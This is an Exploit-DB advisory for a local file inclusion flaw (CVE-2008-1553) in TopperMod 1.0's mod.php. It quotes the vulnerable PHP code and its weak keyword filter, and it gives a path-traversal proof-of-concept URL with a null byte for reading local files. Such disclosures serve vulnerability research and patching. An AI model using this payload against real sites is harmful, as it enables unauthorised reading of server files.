TopperMod 1.0 - 'mod.php' Local File Inclusion

EDB-ID:

5312

CVE:

2008-1553

EDB Verified:

Author:

girex

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-03-25

Vulnerable App: 
# Author:	__GiReX__
# mySite:	girex.altervista.org

# CMS: 		TopperMod v1.0
# Site:		rtcw.ch/mio/index.php

# Bug: 		Local File Inclusion
# File: 	mod.php
# Var :		$to


# Bug explanation - Vuln Code:

	if (isset($_GET['mod'])) { $mod = stripslashes($_GET['mod']); } else { header("location index.php"); Die(); }
	if (isset($_GET['to'])) { $to = stripslashes($_GET['to']); } else { $to="index"; }

# Our bugged vars are GET's var so we don't need Register_Globals turned On
 
 
	$vietate=array("http","select","union","where","delete","insert","alert","document");
		if (ereg($vietate,strtolower($mod)) OR ereg($vietate,strtolower($to)) ) { 
	 		echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
		} elseif (ereg("[a-zA-Z0-9]",$mod) OR ereg("[a-zA-Z0-9]",$to)) {

# Our exploitation don't use a $vietate word and
# the check of ereg() return true if we use some letters


  ...
# ... we must be logged in and $mod must be a real section
  ...


	if (file_exists("mod/$mod/".$to.".php") ) {
		include("mod/$mod/".$to.".php");
	} else {
		echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
				}

# var $to is not sanizated so we can exploit thought Local File Inclusion


PoC:  [host]/[path]/mod.php?mod=account&to=../../[local file]%00

# milw0rm.com [2008-03-25]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services